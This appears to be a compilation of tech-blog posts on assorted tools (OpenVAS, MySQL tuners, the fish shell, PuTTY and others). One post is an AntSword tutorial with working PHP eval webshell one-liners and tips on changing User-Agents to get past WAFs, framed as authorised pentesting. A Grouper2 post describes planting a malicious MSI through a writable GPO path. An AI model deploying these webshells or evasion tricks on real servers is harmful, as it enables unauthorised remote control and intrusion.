Useful tools for Python

Python Tutor

Free online Python code visualization, Python learning tool.

Python Tutor
Python Tutor

http://pythontutor.com/

Anaconda

Easy package management

Packed with many useful Python tools

Anaconda
Anaconda
Anaconda - Software
Anaconda – Software

https://www.anaconda.com/distribution/#download-section

Jupyter Notebook

Jupyter notebook is like a magic notebook for Python. It can be used to share Notes, algebra, data analytics, code etc easily.

Jupyter Notebook
Jupyter Notebook

https://jupyter.org/install

(We can use Anaconda to install it easily)

IPython

IPython is a interactive shell for Python.

Supports Automatic indenting, bash shell commands, many built-in functions etc.

https://ipython.org/

Skulpt

Skulpt is a online Python environment built via javascript. Use with CodeMirror, we can do basic Python programming.

Skulpt
Skulpt

http://skulpt.org/


How to: Start/Use/Initialize OpenVAS – Open Vulnerability Assessment Scanner on Kali Linux (Intro)

Before using the OpenVAS, we need to setup and update it.

1 Launch a terminal, and run setup for OpenVAS

sudo openvas-setup

Wait until it finishes downloading and updating, it will take awhile

2 When it’s done, it will show the admin login username and admin login password, note them down, we will need them every time we try to login to OpenVAS

openvas-setup done
openvas-setup done

*3 Update feed for OpenVAS (Only required if there is new updates), when initializing, this step was done once already.

sudo openvas-feed-update

If failed (You might encounter this error)

rsync: failed to connect to feed.openvas.org (xx.xx.xx.xx): Connection refused (111)
rsync: failed to connect to feed.openvas.org (xx:xx:xx:xx::xx): Connection timed out (110)
rsync error: error in socket IO (code 10) at clientserver.c(127) [Receiver=3.1.3]

Just try again with the same command, it should get through.

4 Launch OpenVAS

sudo openvas-start

It will tell us the address for webui, in this case, it is https://127.0.0.1:9392

OpenVAS webui
OpenVAS webui

(We might encounter following error)

Failed to execute default Web Browser
Failed to execute default Web Browser

It’s OK, just close it, then launch our favourite web browser then enter https://127.0.0.1:9392 as the address

Now we should have the OpenVAS login screen in front of us.

OpenVAS login screen
OpenVAS login screen

5 Enter your login detail recorded from step 2

Now you will see the Dashboard of OpenVAS.

Happy hunting/fixing 🙂


AntSword – a Security Tool for Post Exploitation

AntSword
AntSword

AntSword is an very easy to use tool for pentesters, security groups as a Post Exploitation tool it can also be used for webmasters etc. Do not use this tool on unauthorized servers/environments or for illegal purpose. It can be a better alternative to Weevely

Description from Official website

AntSword is an open source, cross-platform website administration tool, being designed to meet the needs of penetration testers together with security researchers with permissions and/or authorizations as well as webmasters.
 
Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.

1 Installation

1.1 Download correct file/zip file

The AntSword-Loader (or A launcher) can be downloaded here: https://github.com/AntSwordProject/AntSword-Loader

It can be used on Microsoft Windows, Linux and macOS platforms.

Windows AntSword
Windows AntSword

1.2 Install or unzip content

Here, we unzip to “C:\Users\win10\Desktop\as-4.0.3”

Unzip AntSword
Unzip AntSword

1.3 Launch “AntSword.exe”

AntSword::Loader
AntSword::Loader

1.4 Click on “Initialize” button

1.5 Select a working directory

In this example, we create a “working-dir” working directory under main directory which is “C:\Users\win10\Desktop\as-4.0.3\working-dir”

Select the folder, then click on “Select folder” button

It will start to download necessary package (Which is “antSword-master.zip”)

(You might encounter following error)

Unzip Error Code: [object Object]

Unzip Error Code: [object Object]
Unzip Error Code: [object Object]

If you have encountered this error follow 1.5.1

1.5.1 Fix the error

Open the working directory we have just selected, a folder with name “antSword-master” and a zip file with name “antSword-master.zip” may appear there, delete them.

1.5.2 Try to launch the AntSword-Loader with Admin rights, then repeat Step 1.3 to Step 1.5 again.

We should be able to see following screen

download successful Extracting file...
download successful Extracting file…

When it’s done

Set up successful Please manually restart later!
Set up successful Please manually restart later!

Then, this Window will disappear, the program will terminate by itself.

1.6 Now we can launch the “AntSword.exe” again, it is now ready to be used

2 Simple usage Demonstration

First, we need to deploy a webshell/Sometimes… so called backdoor/Trojan

In this example we are going to use PHP

2.1 Create a php file “test.php”

2.2 Save following content to “test.php” file

<?php eval($_POST['mytestshell']); ?>

2.3 Upload to your own testing server (Please do not test on production server or any server which does not belong to you)

2.4 Right click on blank space, click on “Add”

2.5 Enter correct server details

Shell url: Your test.php path

Shell pwd: Shell password which is the content behind $_POST, “mytestshell” in this case

Shell type: PHP

2.6 Click on “Add” button

Add Shell
Add Shell

2.5 Now it will appear under “Shell Lists”

Shell Lists
Shell Lists

2.6 Double click on the item, we can now see all files on the server (As long as the user who is running the server process has corresponding privileges)

View folders, files on the server
View folders, files on the server
View folders, files on the server
View folders, files on the server

We can even upload, download files to/from selected folder/file, create, modify, delete files and folders, even open Terminal

AntSword connected to WebShell
AntSword connected to WebShell
AntSword connected to WebShell
AntSword connected to WebShell

3 Other

It also supports other Shell types besides PHP

Add shell - Shell type
Add shell – Shell type

Send customized HTTP Header/Body value

Add shell - HTTP Header, Body
Add shell – HTTP Header, Body

Other settings

Add shell - Other
Add shell – Other

Proxy, Plugin Store, Encoder etc.

AntSword
AntSword

AntSword official documentation: https://doc.u0u.us/en/getting_started/first_shell.html

Bonus 1 – Use AntSword with PHP get request

Wonder how to use AntSword with $_GET rather than $_POST in PHP?

Here is how

The PHP file

Rather than

<?php eval($_POST['mytestshell']); ?>

We use

<?php eval($_GET['mytestshell']); ?>

The Settings in AntSword

Shell url: http://xxxxxxxxxx.com/test.php?mytestshell=eval($_POST[‘mypswd’]);

Shell pwd: mypswd

Bonus 2 – Modify User-Agents

By default, AntSword uses “antSword/v2.1” or “antSword/v2.0” as user agent when updating the webshell information or connecting the webshell. Which can be recognized by WAF or human easily.

To change User-Agent for AntSword.

There are 2 files and 3 places we need to modify

b2.1.1 File 1 is “request.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\request.js”

Note: “working-dir” was created during Step 1.5

b2.1.2 Open “request.js” via Notepad or any text editor, Search for “USER_AGENT”

b2.1.3 Change “antSword/v2.1” to what ever you like, then save the file

b2.2.1 File 2 is “update.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\update.js”

b2.2.2 Open “update.js” via Notepad or any text editor, Search for “User-Agent”

b2.2.3 Change “antSword/v2.0” to what ever you like, then save the file

Bonus 3 – Latest User-Agents

Chrome

on Windows

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Linux

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Android

Mozilla/5.0 (Linux; Android 8.0.0;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/80.0.3987.95 Mobile/15E148 Safari/605.1

Firefox

on Windows

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/74.0

on Linux

Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/74.0

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/74.0

on Android

Mozilla/5.0 (Android 8.0.0; Mobile; rv:61.0) Gecko/61.0 Firefox/68.0

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/23.0 Mobile/16B92 Safari/605.1.15

IE 11/Internet Explorer 11 on Windows 10

Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko

Edge on Windows 10

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Edg/80.0.361.62

YandexBot

Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)


There are many more features we can utilize, including encoding/decoding, which is very helpful when trying to evading Web Application Firewall (WAF), plugins, Multipart payload etc.

Warning: Do not use or test this tool on unauthorised servers.


How to: Optimize MySQL, MariaDB with Simple Tools

1 mysqltuner.pl

mysqltuner.pl
mysqltuner.pl

Supports MySQL, MariaDB, Percona Server etc. with over 300

Tuning MySQL performance, checks configuration, including log file settings, storage engine, security. Outline potential issues/fix.

1.1 Download

cd /tmp
 
wget https://raw.githubusercontent.com/major/MySQLTuner-perl/master/mysqltuner.pl
 
chmod +x mysqltuner.pl

1.2 Usage

 ./mysqltuner.pl --socket /var/lib/mysql/mysql.sock 

1.3 Output

Items with [!!] are important e.g. Maximum possible memory usage: 10G (300% of installed RAM)

Last section with “Recommendations” tells us where we can look into, which Variables we should adjust and suggested values etc.

mysqltuner.pl: https://github.com/major/MySQLTuner-perl

2 tuning-primer.sh

Similar to mysqltuner.pl.

Currently it handles recomendations for the following:

  • Slow Query Log
  • Max Connections
  • Worker Threads
  • Key Buffer [MyISAM only]
  • Query Cache
  • Sort Buffer
  • Joins
  • Temp Tables
  • Table (Open & Definition) Cache
  • Table Locking
  • Table Scans (read_buffer) [MyISAM only]
  • InnoDB Status

2.1 Download

cd /tmp
 
wget https://launchpad.net/mysql-tuning-primer/trunk/1.6-r1/+download/tuning-primer.sh
 
chmod +x tuning-primer.sh

2.2 Usage

./tuning-primer.sh

tuning-primer.sh: https://github.com/BMDan/tuning-primer.sh

3 pt-variable-advisor

Analyses MySQL variables, output suggestions based on those variables.

3.1 Download

https://www.percona.com/downloads/percona-toolkit/LATEST/

3.2 Usage

pt-variable-advisor localhost --socket /var/lib/mysql/mysql.sock

4 pt-qurey-digest

Analyses log, process list, tcpdump for MySQL queries. Mainly used to analyze slow queries. pt-qurey-digest outputs more details compare to py-query_digest.

4.1 Download

Sames as “3 pt-variable-advisor”

4.2 Usage

pt-query-digest /var/lib/mysql/slowtest-slow.log

4.3 Other usages

# Analyze slow quires
pt-query-digest /var/lib/mysql/slowtest-slow.log > slow_report.log
 
# Quires within 24 hours
pt-query-digest --since=24h /var/lib/mysql/slowtest-slow.log > slow_report.log
 
# Quires within specified time frame
pt-query-digest /var/lib/mysql/slowtest-slow.log --since '2020-01-01 00:00:00' --until '2012-01-10 00:00:00'> > slow_report.log
 
# Slow quires with select
pt-query-digest --filter '$event->{fingerprint} =~ m/^select/i' /var/lib/mysql/slowtest-slow.log> slow_report.log
 
# Query from specific user
pt-query-digest --filter '($event->{user} || "") =~ m/^root/i' /var/lib/mysql/slowtest-slow.log> slow_report.log
 
# All full table scanning, full join slow quires
pt-query-digest --filter '(($event->{Full_scan} || "") eq "yes") ||(($event->{Full_join} || "") eq "yes")' /var/lib/mysql/slowtest-slow.log> slow_report.log

How to: Quickly and Easily search a folder, partition or even computer for files in Microsoft Windows

When using Windows built-in search function, it can take ages to search a partition, it will take even longer if you want to search files across all partitions.

Everything is a free filename search software for Windows that can bring up your search results in seconds.

Everything
Everything
  • Small installation file
  • Clean and simple user interface
  • Quick file indexing
  • Quick searching
  • Quick startup
  • Minimal resource usage
  • Small database on disk
  • Real-time updating
  • Multilingual support
  • Has official portable version

Download Everything 1.4.1.935

Installer

64-bit Installer

Portable zip

64-bit Portable zip

Supported Languages

Language pack for Everything

Resource

Official website


Powerful Linux Interactive shell

fish (friendly interactive shell) is a smart and user-friendly command line shell for Linux, macOS, and the rest of the family.

Autosuggestions

Autosuggestion Thumbnail

fish suggests commands as you type based on history and completions, just like a web browser. Watch out, Netscape Navigator 4.0!

Glorious VGA Color

Colors Thumbnail

fish supports 24 bit true color, the state of the art in terminal technology. Behold the monospaced rainbow.

Sane Scripting

Scripting Thumbnail

fish is fully scriptable, and its syntax is simple, clean, and consistent. You’ll never write esac again.

Web Based configuration

Web Config Thumbnail

For those lucky few with a graphical computer, you can set your colors and view functions, variables, and history all from a web page.

Man Page Completions

Man Page Completions Thumbnail

Other shells support programmable completions, but only fish generates them automatically by parsing your installed man pages.

Works Out Of The Box

Works Out of the Box Thumbnail

fish will delight you with features like tab completions and syntax highlighting that just work, with nothing new to learn or configure.

fish can be installed easily on most Linux distros with their default package manager.

Linux

# Debian/Ubuntu/Kali Linux etc.
sudo apt install fish
 
# RHEL/CentOS/Fedora
sudo dns install fish
or, for older version
sudo yum install fish
 
# Archlinux
pacman -S fish
 
# gentoo Linux
emerge fish
 
# void-Linux
xbps-install fish-shell
 
# NixOS
nix-env -i fish
 
# Guix
guix package -i fish
 
# Solus
eopkg install fish
 
# Hombrew
brew install fish

BSD

# FreeBSD
pkg install fish
 
# OpenBSD
pkg_add fish

Windows

# Cygwin
fish is available in setup, in the Shells category.
 
# Windows Subsystem for Linux
sudo apt install fish
or
depend on the Linux distro you've chose, refer to the above "Linux" part to find correct command to use
 
# MSYS2
pacman -S fish

masOS

# Homebrew
brew install fish
 
# MacPorts
sudo port install fish
 
# Installer
https://github.com/fish-shell/fish-shell/releases/download/3.1.0/fish-3.1.0.pkg
 
10.6+: Installs to /usr/local/

Bonus

  • To use, type fish in the terminal then hit Enter key

To check fish version

echo $FISH_VERSION

HTML version help document

help

To switch default shell to fish

sudo chsh -s /usr/bin/fish

To switch back to default bash shell

sudo chsh -s /bin/bash

(If your default shell is zsh)

sudo chsh -s /usr/zsh

Simple/Quick List of Free Code Editors (Include free, open source)

(There are many commercial editors with trial period, they are not included in this list, only free or open source editors are listed)

  1. Aptana Studio (Windows, Linux, macOS)
  2. Atom.io (Windows, Linux, macOS)
  3. Crimson Editor (Windows)
  4. jEdit (Windows, Linux, macOS)
  5. Notepad++ (Windows)
  6. Programmer’s Notepad (Windows)
  7. PSPad (Windows)
  8. SCREEM (Linux) (HTML/Web)
  9. Visual Studio Code (Windows, Linux, macOS)

Open source/Free tools to find vulnerability in Active Directory (AD) – Grouper2

Grouper2 vs Grouper

Grouper

1 The computer must be joined to the domain with GPMC and RSAT installed

2 User must use Get-GPOReport with PowerShell to generate XML report

3 The report is required by Grouper

4 Users must manually filter out useful data

Grouper2

Grouper2 does not rely on Get-GPOReport, it still needs to parse different types of files format.

1 More accurate file permission detection, no read/write of storage required

2 Won’t ignore GPP password

3 Provide HTML format output

4 Multi-thread support

5 Supports offline mode

Official description

What is it for?

Grouper2 is a tool for pentesters to help find security-related misconfigurations in Active Directory Group Policy.

It might also be useful for other people doing other stuff, but it is explicitly NOT meant to be an audit tool. If you want to check your policy configs against some particular standard, you probably want Microsoft’s Security and Compliance Toolkit, not Grouper or Grouper2.

What does it do?

It dumps all the most interesting parts of group policy and then roots around in them for exploitable stuff.

How is it different from Grouper?

Where Grouper required you to:

  • have GPMC/RSAT/whatever installed on a domain-joined computer
  • generate an xml report with the Get-GPOReport PowerShell cmdlet
  • feed the report to Grouper
  • a bunch of gibberish falls out and hopefully there’s some good stuff in there.

Grouper2 does like Mr Ed suggests and goes straight to the source, i.e. SYSVOL.

This means you don’t have the horrible dependency on Get-GPOReport (hooray!) but it also means that it has to do a bunch of parsing of different file formats and so on (booo!).

Other cool new features:

  • better file permission checks that don’t involve writing to disk.
  • doesn’t miss those GPP passwords that Grouper 1 did.
  • HTML output option so you can preserve those sexy console colours and take them with you.
  • aim Grouper2 at an offline copy of SYSVOL if you want.
  • it’s multithreaded!
  • a bunch of other great stuff but it’s late and I’m tired.

Also, it’s written in C# instead of PowerShell.

How do I use it?

Literally just run the EXE on a domain joined machine in the context of a domain user, and magic JSON candy will fall out.

If the JSON burns your eyes, add -g to make it real pretty.

If you love the prettiness so much you wanna take it with you, do -f "$FILEPATH.html" to puke the candy into an HTML file.

If there’s too much candy and you want to limit output to only the tastiest morsels, set the ‘interest level’ with -i $INT, the bigger the number the tastier the candy, e.g. -i 10 will only give you stuff that will probably result in creds or shells.

If you don’t want to dig around in old policy and want to limit yourself to only current stuff, do -c.

If you want the candy to fall out faster, you can set the number of threads with -t $INT – the default is 10.

If you want to see the other options, do -h.

I don’t get it.

OK have a look at this:

A picture of some Grouper2 output

In the screenshot above we can see an “Assigned Application” policy that is still being pushed to computers, but the MSI file to install is missing, and the directory it’s being installed from is writable by the current user.

If you created a hacked up MSI (e.g. with msfvenom) and then modified it to match the UIDs at the bottom of the picture, it would get executed on machines targeted by the GPO. Sweet!

A picture of some Grouper2 output

In this one you can see that someone’s done something absolutely insane to the ACLS on the registry.

You get the picture.

Resource

Official Github page


Open source SSH/Telnet client

There are many open source and free SSH/Telnet clients, one of them is PuTTY.

PuTTY is very easy to use since it has GUI.

It can be downloaded from their official website

It has Microsoft Windows version, both in msi and exe format. It can be installed on the system or executed directly without installation.

It has Unix/Linux version as well, which can be downloaded from their official website too (source archive)

For Linux operating systems, we can also install directly from package managers as well.

Install on Linux

# Debian/Ubuntu/Kali Linux etc.
sudo apt install putty
 
# CentOS/RHEL/Fedora
sudo dnf install putty
or
sudo yum install putty
 
# Arch Linux
sudo pacman -S putty

Install on Linux from source

tar -xvf putty-0.73.tar.gz
cd putty-0.73/
./configure
sudo make && sudo make install

How to: Put panorama photo together – Panorama photo stitcher

Sometimes we want to put panorama photos together, so that we can have a complete photo.

It can be time consuming if we do it manually, also it requires skill to be done.

To make it easier, we can use software to achieve same or even better results.

Hugin is an open source and completely free software just does that and it’s easy to use as well.

Hugin
Hugin

Some technical details can be found here: Photometric alignment and vignetting correction

Download